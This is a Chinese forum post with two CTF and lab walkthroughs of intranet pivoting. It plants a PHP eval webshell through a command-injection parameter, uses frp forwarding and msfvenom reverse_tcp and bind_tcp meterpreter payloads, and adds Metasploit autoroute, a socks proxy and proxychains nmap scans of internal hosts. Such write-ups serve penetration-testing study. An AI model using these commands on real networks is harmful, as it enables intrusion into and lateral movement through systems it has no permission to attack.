内网穿透案例

zhaorong · 发表于网络安全 2021-11-2 17:53:27


	案列一（Frp内网渗透）大概图列网上随便找的，路线是这个样子这里选用ctfshow的一道命令执行题由Frp实现内网访问及扫描 1.传入一句话，上线蚁剑 http://b85fdf24-b98e-4810-9e76-a038a8987630.challenge.ctf.show:8080/?c=` echo '<?php eval(\$_POST[1]);?>' > 1.php`; 复制代码 2.进行frp转发先服务器启动 ./frps -c frps.ini 复制代码然后再kali启动 ./frpc -c frpc.ini 复制代码 3.制作linux马上线msf msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=公网ip L PORT=6000 -f elf > shell.elf 复制代码直接拖进去并更改权限 kali开启监听运行shell 上线成功 4.添加路由 run post/multi/manage/autoroute 复制代码 5.socks代理转发我们现在可以看见其内网但无法进行扫描和访问 use auxiliary/server/socks_proxy 复制代码执行即可 6.浏览器访问内网 7.nmap扫描内网进入etc目录，按一下f键进行搜索prox 使用root权限进去修改此文件和上面的代理转发相对应使用nmap 注意：这里必须使用-sT和-Pn扫描，不能对内网进行ping访问而，-sT则是TCP连接扫描 proxychains4 nmap -sT -Pn 172.12.132.230 复制代码案列二（CFS三层内网漫游）这里没有web端，但大概思路是一样的主机分别为win sever2008、windows7、win sever 2012，ip地址和上面1、2、3对应 1.msf生成木马上线msf（Targer 1） msfvenom -p windows/meterpreter/reverse_tcp LHOST=19 2.168.76.1 LPORT=2333 -f exe > 2333.exe 复制代码 2.信息收集 ipconfig route 复制代码可以看见我们连接的是76的地址，另一条22应该就是连着下一台内网 3.添加路由 run post/multi/manage/autoroute //自动添加路由 route print 复制代码 4.开代理（socks） use auxiliary/server/socks_proxy 复制代码设置版本为4a 这里的ip和端口和下面的代理对应（prox） 5.nmap扫一下第二台主机我这里没有web端，如果是题基本就有，配置一下浏览器即可这里和上面一样进入etc目录，按一下f键进行搜索prox 使用root权限进去修改此文件 proxychains4 nmap -Pn -sT -v 192.168.22.128 复制代码重点来了（我们以第一个为跳板渗透第二个，因为第二个没有76网段无法收到信息那如何以第二个为跳板渗透第三个呢） 6.生成正向后门反向连接木马是攻击机开放端口，靶机连过来；正向连接木马是靶机开放端口，攻击机连过去； msfvenom -p windows/meterpreter/bind_tcp lport=2333 -f exe > bind_2333.exe 复制代码 7.上线msf set payload windows/meterpreter/bind_tcp set rhost 192.168.22.127 set lport 2333 复制代码注意ip是目标机器的ip，我们攻击的是第二个主机所以就是第二个的ip 后面的操作和前面差不多了总结 web端exp打入第一个服务器上线msf 添加路由，代理等扫描第二个服务器的web网站浏览器开启代理访问第二个服务器的网站，打入exp，通过正向连接上线msf（因为msf虽然为76网段，但可以通过代理以22网段访问第二个服务器。而第二个服务器则不可以访问76网段）继续添加33网段的路由。如果有web端则再。

微信扫一扫 分享朋友圈

内网穿透案例

微信扫一扫分享朋友圈